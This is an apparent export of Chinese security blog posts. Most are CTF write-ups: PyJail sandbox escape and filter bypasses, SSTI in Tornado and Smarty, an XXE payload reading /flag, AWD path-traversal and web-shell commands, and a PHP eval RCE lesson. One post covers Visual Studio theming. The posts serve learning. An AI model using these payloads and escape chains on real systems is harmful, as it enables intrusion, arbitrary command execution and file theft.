<p>最后这个彩蛋剩余部分也没找到<br>网上搜了下才明白：感谢 anweilx 的<a href="https://www.cnblogs.com/anweilx/p/12493000.html">wp</a><br>第一行是俩页面的最后有<br>第二行是在俩页面源码 分别搜<code>奖励</code> 在上面那行一个是 base64 然后再转 url 一个是 hex 解码<br>第三行是俩页面的图片隐写 丢进 winhex<br>第四行有提示<br>aes 256 ecb<a href="http://tool.chacuo.net/cryptaes/">解码</a></p>
<h2 id="其他彩蛋"><a href="#其他彩蛋" class="headerlink" title="其他彩蛋"></a>其他彩蛋</h2><p>剩余皆可在对应页面搜索 egg 即可获得</p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>ctfhub</tag>
      </tags>
  </entry>
  <entry>
    <title>PyJail python沙箱逃逸探究</title>
    <url>/2023/07/PyJail%20python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E6%8E%A2%E7%A9%B6/</url>
    <content><![CDATA[<h2 id="python-特性"><a href="#python-特性" class="headerlink" title="python 特性"></a>python 特性</h2><p>在 python 中，类均继承自<code>object</code>基类；</p>
<h3 id="python-魔术方法"><a href="#python-魔术方法" class="headerlink" title="python 魔术方法"></a>python 魔术方法</h3><ul>
<li><code>__init__</code>：构造函数。这个在实例化类的时候就会用到，一般是接受类初始化的参数，并且进行一系列初始化操作。</li>
<li><code>__len__</code>：返回对象的长度。</li>
<li><code>__str__</code>：返回对象的字符串表示。对一个对象<code>a</code>使用<code>str(a)</code>时，会尝试调用<code>a.__str__()</code>。相似地，还有<code>__int__</code>魔术方法也用于类型转换，不过较少使用。</li>
<li><code>__getitem__</code>：根据索引返回对象的某个元素。对一个对象<code>a</code>使用<code>a[1]</code>时，会尝试调用<code>a.__getitem__(1)</code>。</li>
<li><code>__add__</code>、<code>__sub__</code>、<code>__mul__</code>、<code>__div__</code>、<code>__mod__</code>：算术运算，加减乘除模。如对一个对象<code>a</code>使用<code>a+b</code>时，会尝试调用<code>a.__add__(b)</code>。相应地，对于有些运算，对象需放在后面（第二个操作数）的，则需实现<code>__radd__</code>、<code>__rsub__</code>、<code>__rmul__</code>、<code>__rdiv__</code>、<code>__rmod__</code>，如椭圆曲线上的点的倍点运算<code>G -&gt; d * G</code>，就可以通过实现<code>__rmul__</code>来实现。</li>
<li><code>__and__</code>，<code>__or__</code>、<code>__xor__</code>：逻辑运算，和算术运算类似；</li>
<li><code>__eq__</code>，<code>__ne__</code>、<code>__lt__</code>、<code>__gt__</code>、<code>__le__</code>、<code>__ge__</code>：比较运算，和算术运算类似；例如<code>&#39;贵州&#39; &gt; &#39;广西&#39;</code>，就会转而调用<code>&#39;贵州&#39;.__gt__(&#39;广西&#39;)</code>；</li>
<li><code>__getattr__</code>：对象是否含有某属性。如果我们对对象<code>a</code>所对应的类实现了该方法，那么在调用未实现的<code>a.b</code>时，就会转而调用<code>a.__getattr__(b)</code>。这也等价于用函数的方法调用：<code>getattr(a, &#39;b&#39;)</code>。有<code>__getattr__</code>，自然也有对应的<code>__setattr__</code>；</li>
<li><code>__subclasses__</code>：返回当前类的所有子类。一般是用在<code>object</code>类中，在<code>object.__subclasses__()</code>中，我们可以找到<code>os</code>模块中的类，然后再找到<code>os</code>，并且执行<code>os.system</code>，实现 RCE。</li>
</ul>
<h3 id="python-魔术属性"><a href="#python-魔术属性" class="headerlink" title="python 魔术属性"></a>python 魔术属性</h3><ul>
<li><p><code>__dict__</code>：可以查看内部所有属性名和属性值组成的字典。</p>
</li>
<li><p><code>__doc__</code>：类的帮助文档。默认类均有帮助文档。对于自定义的类，需要我们自己实现。</p>
</li>
<li><p><code>__class__</code>：返回当前对象所属的类。如<code>&#39;&#39;.__class__</code>会返回<code>&lt;class &#39;str&#39;&gt;</code>。拿到类之后，就可以通过构造函数生成新的对象，如<code>&#39;&#39;.__class__(4396)</code>，就等价于<code>str(4396)</code>，即<code>&#39;4396&#39;</code>；</p>
</li>
<li><p><code>__base__</code>：返回当前类的基类。如<code>str.__base__</code>会返回<code>&lt;class &#39;object&#39;&gt;</code>；</p>
</li>
</ul>
<h3 id="其他内置函数和变量"><a href="#其他内置函数和变量" class="headerlink" title="其他内置函数和变量"></a>其他内置函数和变量</h3><ul>
<li><code>dir</code>：查看对象的所有属性和方法。在我们没有思路的时候，可以通过该函数查看所有可以利用的方法；此外，在题目禁用引号以及小数点时，也可以先用拿到类所有可用方法，再索引到方法名，并且通过<code>getattr</code>来拿到目标方法。</li>
<li><code>chr</code>、<code>ord</code>：字符与 ASCII 码转换函数，能帮我们绕过一些 WAF</li>
<li><code>globals</code>：返回所有全局变量的函数；</li>
<li><code>locals</code>：返回所有局部变量的函数；</li>
<li><code>__import__</code>：载入模块的函数。例如<code>import os</code>等价于<code>os = __import__(&#39;os&#39;)</code>；</li>
<li><code>__name__</code>：该变量指示当前运行环境位于哪个模块中。如我们 python 一般写的<code>if __name__ == &#39;__main__&#39;:</code>，就是来判断是否是直接运行该脚本。如果是从另外的地方 import 的该脚本的话，那<code>__name__</code>就不为<code>__main__</code>，就不会执行之后的代码。更多参考<a href="https://link.zhihu.com/?target=https://www.geeksforgeeks.org/__name__-a-special-variable-in-python/">这里</a>；</li>
<li><code>__builtins__</code>：包含当前运行环境中默认的所有函数与类。如上面所介绍的所有默认函数，如<code>str</code>、<code>chr</code>、<code>ord</code>、<code>dict</code>、<code>dir</code>等。在 pyjail 的沙箱中，往往<code>__builtins__</code>被置为<code>None</code>，因此我们不能利用上述的函数。所以一种思路就是我们可以先通过类的基类和子类拿到<code>__builtins__</code>，再<code>__import__(&#39;os&#39;).system(&#39;sh&#39;)</code>进行 RCE；</li>
<li><code>__file__</code>：该变量指示当前运行代码所在路径。如<code>open(__file__).read()</code>就是读取当前运行的 python 文件代码。需要注意的是，<strong>该变量仅在运行代码文件时会产生，在运行交互式终端时不会有此变量</strong>；</li>
<li><code>_</code>：该变量返回上一次运行的 python 语句结果。需要注意的是，<strong>该变量仅在运行交互式终端时会产生，在运行代码文件时不会有此变量</strong>。</li>
</ul>
<h2 id="WAF"><a href="#WAF" class="headerlink" title="WAF"></a>WAF</h2><h3 id="过滤"><a href="#过滤" class="headerlink" title="过滤[]"></a>过滤<code>[]</code></h3><p>使用<code>pop</code>、<code>__getitem__</code> 代替</p>
<p>例如：<code>a.__getitem__(0)</code>、<code>&#123;&quot;a&quot;: 1&#125;.pop(&quot;a&quot;)</code></p>
<p>或使用 next 等指针指向(类似无参 RCE 特殊函数遍历)</p>
<p>需要去别的是 python 需要使用迭代器<code>iter(object[, sentinel])</code>作为传入函数</p>
<h3 id="过滤字符"><a href="#过滤字符" class="headerlink" title="过滤字符"></a>过滤字符</h3><h6 id="chr-函数构造字符"><a href="#chr-函数构造字符" class="headerlink" title="chr() 函数构造字符"></a><code>chr()</code> 函数构造字符</h6><h4 id="利用输出"><a href="#利用输出" class="headerlink" title="利用输出"></a>利用输出</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="built_in">str</span>(().__class__.__new__)[i]+……</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">&gt;&gt;&gt;<span class="built_in">print</span>(<span class="built_in">str</span>(().__class__.__new__))</span><br><span class="line">&lt;built-<span class="keyword">in</span> method __new__ of <span class="built_in">type</span> <span class="built_in">object</span> at <span class="number">0x00007FFF01FE8AB0</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="过滤数字"><a href="#过滤数字" class="headerlink" title="过滤数字"></a>过滤数字</h3><ul>
<li>0：<code>int(bool([]))</code>、<code>Flase</code>、<code>len([])</code>、<code>any(())</code></li>
<li>1：<code>int(bool([&quot;&quot;]))</code>、<code>True</code>、<code>all(())</code>、<code>int(list(list(dict(a၁=())).pop()).pop())</code></li>
<li>len：len(str({}.keys))</li>
<li>1.0：<code>float(True)</code></li>
<li>-1：<code>~0</code></li>
</ul>
<h3 id="过滤特殊字符"><a href="#过滤特殊字符" class="headerlink" title="过滤特殊字符"></a>过滤特殊字符</h3><p>str 被过滤<code>type(&#39;&#39;)()</code>、<code>format()</code> 即可。同理，<code>int</code>、<code>list</code> 都可以用 <code>type</code> 构造出来。</p>
<h3 id="Non-ASCII-Identifiers"><a href="#Non-ASCII-Identifiers" class="headerlink" title="Non-ASCII Identifiers"></a>Non-ASCII Identifiers</h3><p>在 python3 中支持 Non-ASCII Identifies 并且所有都会被转换成 unicode 的 NFKC（也就是标准模式）。我们可以用斜体或者花体各种各样的与标准字母相像的来进行导包操作。</p>
<blockquote>
<h4 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h4><p><a href="https://zhuanlan.zhihu.com/p/578966149">PyJail python 沙箱逃逸探究·总览</a></p>
<p><a href="http://twe1v3.top/2023/02/pyjail-%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93%E3%80%90CV%E3%80%91/#more">pyjail-学习总结【CV】 | TWe1v3</a></p>
</blockquote>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>python</tag>
        <tag>沙箱逃逸</tag>
        <tag>PyJail</tag>
      </tags>
  </entry>
  <entry>
    <title>SSTI模板注入</title>
    <url>/2023/07/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</url>
    <content><![CDATA[<p><img src= "/img/12ec799b41b544eb83db7a111956c0cb.png" alt="在这里插入图片描述"></p>
<h2 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h2><p>ssti 注入点在 msg<br>注入49出现 orz 应该是有过滤</p>
1正常
<p>hint 里缺 cookie_secret<br>该项在 handler.settings</p>
<blockquote>
<p>Handler 这个对象，Handler 指向的处理当前这个页面的 RequestHandler 对象<br>RequestHandler 中并没有 settings 这个属性，与 RequestHandler 关联的 Application 对象（Requestion.application）才有 setting 这个属性<br>handler 指向 RequestHandler<br>而 RequestHandler.settings 又指向 self.application.settings<br>所有 handler.settings 就指向 RequestHandler.application.settings 了！</p>
</blockquote>
<p><img src= "/img/ac2991bc7e1e4e64b87451461cb17916.png" alt="在这里插入图片描述">然后按 hint 里的 MD5 加密过后传参<br><img src= "/img/3ee21ded82d8493baba4f8b5b940927a.png" alt="在这里插入图片描述"></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">?filename=/fllllllllllllag&amp;filehash=ff92d5623223cadc00efabfc7676f9fe</span><br></pre></td></tr></table></figure>

<p>filehash 不同 请自行加密<br><img src= "/img/c860336ae81a4d6e8c52328bf1ae378c.png" alt="在这里插入图片描述"></p>
<h2 id="BJDCTF2020-The-mystery-of-ip"><a href="#BJDCTF2020-The-mystery-of-ip" class="headerlink" title="[BJDCTF2020]The mystery of ip"></a>[BJDCTF2020]The mystery of ip</h2><p><img src= "/img/ec82c70c7fdf49b698f9095bda0d1662.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="keyword">require_once</span>(<span class="string">&#x27;header.php&#x27;</span>);</span><br><span class="line">	<span class="keyword">require_once</span>(<span class="string">&#x27;./libs/Smarty.class.php&#x27;</span>);</span><br><span class="line">	<span class="variable">$smarty</span> = <span class="keyword">new</span> <span class="title class_">Smarty</span>();</span><br><span class="line">	<span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_CLIENT_IP&#x27;</span>]))</span><br><span class="line">	&#123;</span><br><span class="line">		   <span class="variable">$ip</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_CLIENT_IP&#x27;</span>];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">elseif</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]))</span><br><span class="line">	&#123;</span><br><span class="line">	    <span class="variable">$ip</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">	    <span class="variable">$ip</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//$your_ip = $smarty-&gt;display(&quot;string:&quot;.$ip);</span></span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;div class=\&quot;container panel1\&quot;&gt;</span></span><br><span class="line"><span class="string">				&lt;div class=\&quot;row\&quot;&gt;</span></span><br><span class="line"><span class="string">				&lt;div class=\&quot;col-md-4\&quot;&gt;</span></span><br><span class="line"><span class="string">				&lt;/div&gt;</span></span><br><span class="line"><span class="string">				&lt;div class=\&quot;col-md-4\&quot;&gt;</span></span><br><span class="line"><span class="string">				&lt;div class=\&quot;jumbotron pan\&quot;&gt;</span></span><br><span class="line"><span class="string">					&lt;div class=\&quot;form-group log\&quot;&gt;</span></span><br><span class="line"><span class="string">						&lt;label&gt;&lt;h2&gt;Your IP is : &quot;</span>;</span><br><span class="line">	<span class="variable">$smarty</span>-&gt;<span class="title function_ invoke__">display</span>(<span class="string">&quot;string:&quot;</span>.<span class="variable">$ip</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;				&lt;/h2&gt;&lt;/label&gt;</span></span><br><span class="line"><span class="string">					&lt;/div&gt;</span></span><br><span class="line"><span class="string">				&lt;/div&gt;</span></span><br><span class="line"><span class="string">				&lt;/div&gt;</span></span><br><span class="line"><span class="string">				&lt;div class=\&quot;col-md-4\&quot;&gt;</span></span><br><span class="line"><span class="string">				&lt;/div&gt;</span></span><br><span class="line"><span class="string">				&lt;/div&gt;</span></span><br><span class="line"><span class="string">			&lt;/div&gt;&quot;</span>;</span><br><span class="line">	<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src= "/img/eb0e52d7b7f74ac1bb74f7c38b4ca72f.png" alt="在这里插入图片描述"></p>
<h2 id="BJDCTF2020-Cookie-is-so-stable"><a href="#BJDCTF2020-Cookie-is-so-stable" class="headerlink" title="[BJDCTF2020]Cookie is so stable"></a>[BJDCTF2020]Cookie is so stable</h2><p><img src= "/img/f568432cbffb4e5f9603858a0cfa797d.png" alt="在这里插入图片描述"></p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>SSTI</tag>
        <tag>模板注入</tag>
      </tags>
  </entry>
  <entry>
    <title>xxe</title>
    <url>/2023/07/XXE/</url>
    <content><![CDATA[<h3 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h3><p>发现输入的 username 被 alert 了<br>查源码</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">onclick = <span class="string">&quot;XMLFunction()&quot;</span>;</span><br></pre></td></tr></table></figure>

<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254264857-190.png" alt="在这里插入图片描述">抓包看 xml 格式<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254267429-193.png" alt="在这里插入图片描述">回来看控制台<br>发现 js 的 xml 应用</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">&lt;script type=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><br><span class="line">        <span class="keyword">function</span> <span class="title function_">XMLFunction</span>(<span class="params"></span>)&#123;</span><br><span class="line">            <span class="keyword">var</span> xml = <span class="string">&#x27;&#x27;</span> +</span><br><span class="line">                <span class="string">&#x27;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&#x27;</span> +</span><br><span class="line">            <span class="string">&#x27;&lt;root&gt;&#x27;</span> +</span><br><span class="line">            <span class="string">&#x27; &lt;username&gt;&#x27;</span> + $(<span class="string">&#x27;#username&#x27;</span>).<span class="title function_">val</span>() + <span class="string">&#x27;&lt;/username&gt;&#x27;</span> +</span><br><span class="line">            <span class="string">&#x27; &lt;password&gt;&#x27;</span> + $(<span class="string">&#x27;#password&#x27;</span>).<span class="title function_">val</span>() + <span class="string">&#x27;&lt;/password&gt;&#x27;</span> +</span><br><span class="line">            <span class="string">&#x27; &lt;/root&gt;&#x27;</span>;</span><br><span class="line">            <span class="keyword">var</span> xmlhttp = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span><br><span class="line">            xmlhttp.<span class="property">onreadystatechange</span> = <span class="keyword">function</span> (<span class="params"></span>) &#123;</span><br><span class="line">                <span class="keyword">if</span>(xmlhttp.<span class="property">readyState</span> == <span class="number">4</span>)&#123;</span><br><span class="line">                    <span class="variable language_">console</span>.<span class="title function_">log</span>(xmlhttp.<span class="property">readyState</span>);</span><br><span class="line">                    <span class="variable language_">console</span>.<span class="title function_">log</span>(xmlhttp.<span class="property">responseText</span>);</span><br><span class="line">                    <span class="title function_">alert</span>(xmlhttp.<span class="property">responseText</span>);</span><br><span class="line"></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            xmlhttp.<span class="title function_">open</span>(<span class="string">&quot;POST&quot;</span>,<span class="string">&quot;login.php&quot;</span>,<span class="literal">true</span>);</span><br><span class="line">            xmlhttp.<span class="title function_">send</span>(xml);</span><br><span class="line">        &#125;;</span><br><span class="line">    &lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>构造 xxe 攻击<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254269819-196.png" alt="在这里插入图片描述">这是 post 包<code>传的时候记得把注释删去</code></p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">root</span>[</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="keyword">flag</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///flag&quot;</span>&gt;</span>&lt;!--构造实体--&gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">username</span>&gt;</span><span class="symbol">&amp;flag;</span><span class="tag">&lt;/<span class="name">username</span>&gt;</span><span class="comment">&lt;!--输出flag实体--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">password</span>&gt;</span>2333<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>flag{6866a844-3788-4a9d-9909-1d9d9943f56f}</p>
<p><img src= "/img/cd6a7f863a0647bb892ae50de7f3e0f9.png" alt="在这里插入图片描述"><br><img src= "/img/13c964cfa670469aa893c588d287e821.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* autor: c0ny1</span></span><br><span class="line"><span class="comment">* date: 2018-2-7</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$USERNAME</span> = <span class="string">&#x27;admin&#x27;</span>; <span class="comment">//账号</span></span><br><span class="line"><span class="variable">$PASSWORD</span> = <span class="string">&#x27;024b87931a03f738fff6693ce0a78c88&#x27;</span>; <span class="comment">//密码</span></span><br><span class="line"><span class="variable">$result</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">libxml_disable_entity_loader</span>(<span class="literal">false</span>);</span><br><span class="line"><span class="variable">$xmlfile</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://input&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">	<span class="variable">$dom</span> = <span class="keyword">new</span> <span class="title class_">DOMDocument</span>();</span><br><span class="line">	<span class="variable">$dom</span>-&gt;<span class="title function_ invoke__">loadXML</span>(<span class="variable">$xmlfile</span>, LIBXML_NOENT | LIBXML_DTDLOAD);</span><br><span class="line">	<span class="variable">$creds</span> = <span class="title function_ invoke__">simplexml_import_dom</span>(<span class="variable">$dom</span>);</span><br><span class="line"></span><br><span class="line">	<span class="variable">$username</span> = <span class="variable">$creds</span>-&gt;username;</span><br><span class="line">	<span class="variable">$password</span> = <span class="variable">$creds</span>-&gt;password;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$username</span> == <span class="variable">$USERNAME</span> &amp;&amp; <span class="variable">$password</span> == <span class="variable">$PASSWORD</span>)&#123;</span><br><span class="line">		<span class="variable">$result</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">&quot;&lt;result&gt;&lt;code&gt;%d&lt;/code&gt;&lt;msg&gt;%s&lt;/msg&gt;&lt;/result&gt;&quot;</span>,<span class="number">1</span>,<span class="variable">$username</span>);</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="variable">$result</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">&quot;&lt;result&gt;&lt;code&gt;%d&lt;/code&gt;&lt;msg&gt;%s&lt;/msg&gt;&lt;/result&gt;&quot;</span>,<span class="number">0</span>,<span class="variable">$username</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;<span class="keyword">catch</span>(<span class="built_in">Exception</span> <span class="variable">$e</span>)&#123;</span><br><span class="line">	<span class="variable">$result</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">&quot;&lt;result&gt;&lt;code&gt;%d&lt;/code&gt;&lt;msg&gt;%s&lt;/msg&gt;&lt;/result&gt;&quot;</span>,<span class="number">3</span>,<span class="variable">$e</span>-&gt;<span class="title function_ invoke__">getMessage</span>());</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: text/html; charset=utf-8&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$result</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>有 admin 密码了也没用<br>藏内网了，上次比赛 ssrf 题出过</p>
<ul>
<li>etc&#x2F;hosts</li>
<li>proc&#x2F;net&#x2F;arp<br><img src= "/img/a3a597abcb6b4158bcce5dcbb89afe09.png" alt="在这里插入图片描述"></li>
</ul>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>xxe</tag>
        <tag>buuctf</tag>
      </tags>
  </entry>
  <entry>
    <title>Visual Studio 2022界面美化教程</title>
    <url>/2023/07/Visual%20Studio%202022%E7%95%8C%E9%9D%A2%E7%BE%8E%E5%8C%96%E6%95%99%E7%A8%8B/</url>
    <content><![CDATA[<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254207258-133.png" alt="点击并拖拽以移动"></p>
<p> 我之前用的是2019版本，后来有出新版我也没管，直到前几天他给我推送2022版了，查了下大部分都是好评（bug恐惧症和恋旧），于是我决定入2022版了，但又怕我在2019调好的设置用不到2022上，于是暂时让两个版本共存，等2022调试好了再说2019的事。</p>
<p>这是我在2019上美化用到的插件和设置（因为网上类似的不少，但2022版貌似没有人发过，所以我决定写这篇文章）</p>
<p>不出所料，2022版好多东西更新，导致一些东西不能用了，导入2019版甚至文件的时候，有一部分报错了，要不然就是改名了，要不然就是更新换代了，没大有影响，以萌新目前来看，是往好的方向发展了。</p>
<p>但是我的那些美化插件直接搜名字的话是找不到了，于是我就在那找替代品，就找到了这两个插件。</p>
<p>第一个插件，是2019版变的，变了样之后差点给我整不会了，它是类似于编程。</p>
<p>新建项目 C#里面最后一项</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254210315-136.png" alt="点击并拖拽以移动"></p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254212027-139.png" alt="da3a0ac9713d4b289c4351ca0ac8835d.png"></p>
<p> 创建之后，把2019版的该插件里的美化设置导出，然后重命名为CustomTheme.vstheme</p>
<p>然后复制到你新创建的2022版那个项目里，选择替换更新，之后项目文件夹里.sln后缀的那个文件打开，选择你之前那个配置的名字，然后运行，不管他蹦出来啥弹窗，等他一打开接着关了就好，之后重启visualstudio就可以了</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254213778-142.png" alt="点击并拖拽以移动"></p>
<p>这个插件是为后面设置背景图片准备</p>
<p>第二个插件我原来用的是moeIDE，但是2022版它不支持了，所以就用新插件代替了。</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254216001-145.png" alt="点击并拖拽以移动"></p>
<p>背景图是B站1024节发布的一张壁纸，我用ps调了下对比度，让他更鲜艳一些</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254218564-148.png" alt="点击并拖拽以移动"></p>
]]></content>
      <categories>
        <category>资源</category>
      </categories>
      <tags>
        <tag>visual studio 2022</tag>
      </tags>
  </entry>
  <entry>
    <title>2024 长城杯铁人三项半决赛第二赛区 wp</title>
    <url>/2024/05/awdwp/</url>
    <content><![CDATA[<h2 id="CFS"><a href="#CFS" class="headerlink" title="CFS"></a>CFS</h2><h4 id="misc1"><a href="#misc1" class="headerlink" title="misc1"></a>misc1</h4><p>备份文件泄露</p>
<p>下载后是流量包</p>
<p>流量包存在明文 flag</p>
<p>（这里可能是非预期，预期是 aes 破解到 test 密码后，有个页面有个 flag）</p>
<p><img src= "/./img/image-20240421174259759.png" alt="image-20240421174259759"></p>
<h4 id="misc2"><a href="#misc2" class="headerlink" title="misc2"></a>misc2</h4><p>流量里还有一个 flag.zip</p>
<p>导出后</p>
<p>爆破得密码为 123456</p>
<h4 id="web"><a href="#web" class="headerlink" title="web"></a>web</h4><p>存在 rce 查看解析目录后 echo 一句话木马进去</p>
<p>连接后 cat &#x2F;flag 啥啥啥.txt</p>
<p>flag get</p>
<p><img src= "/./img/image-20240421175236.png" alt="屏幕截图 2024-04-21 175236"></p>
<h2 id="AWD"><a href="#AWD" class="headerlink" title="AWD"></a>AWD</h2><p>题目附件备份：</p>
<p><a href="/files/php.7z">php</a></p>
<p><a href="/files/jsp.7z">java1</a></p>
<p><a href="/files/java.7z">java2</a></p>
<h4 id="php"><a href="#php" class="headerlink" title="php"></a>php</h4><p>hook 流量发现一个 php 路径穿越</p>
<p><code>/frontend/ajax/getfile?file=../../../../../../flag.txt</code></p>
<p>修复：</p>
<p>将&#x2F;和.等用于路径穿越的字符过滤置空</p>
<p><img src= "/./img/image-20240421182144415.png" alt="image-20240421182144415"></p>
<h4 id="java1"><a href="#java1" class="headerlink" title="java1"></a>java1</h4><p>一个 java</p>
<p><code>/forget.jsp?cmd1=cat+/flag.txt</code></p>
<p>修复 把 cmd1 字段改成复杂密码 使攻击者无法连接</p>
<p><img src= "/./img/image-20240421182841159.png" alt="image-20240421182841159"></p>
]]></content>
      <categories>
        <category>awd</category>
      </categories>
      <tags>
        <tag>awd</tag>
        <tag>长城杯</tag>
        <tag>铁人三项</tag>
      </tags>
  </entry>
  <entry>
    <title>ctfhub-rce</title>
    <url>/2023/07/ctfhub-rce/</url>
    <content><![CDATA[<p>rce：远程代码执行漏洞<br>分为远程命令执行 ping 和远程代码执行 evel。<br><strong>其实这就是一个接口，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统，这就是 RCE 漏洞</strong>。相当于直接操控服务器电脑的 cmd 命令行！高危漏洞！</p>
<h2 id="eval-执行"><a href="#eval-执行" class="headerlink" title="eval 执行"></a>eval 执行</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>传参给 cmd 来 eval</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">/?cmd=<span class="title function_ invoke__">system</span>(<span class="string">&quot;ls /&quot;</span>);<span class="comment">//此处因为根目录无flag 所以看上一级目录</span></span><br></pre></td></tr></table></figure>

<p>找到后 再 cat &#x2F;flag_****</p>
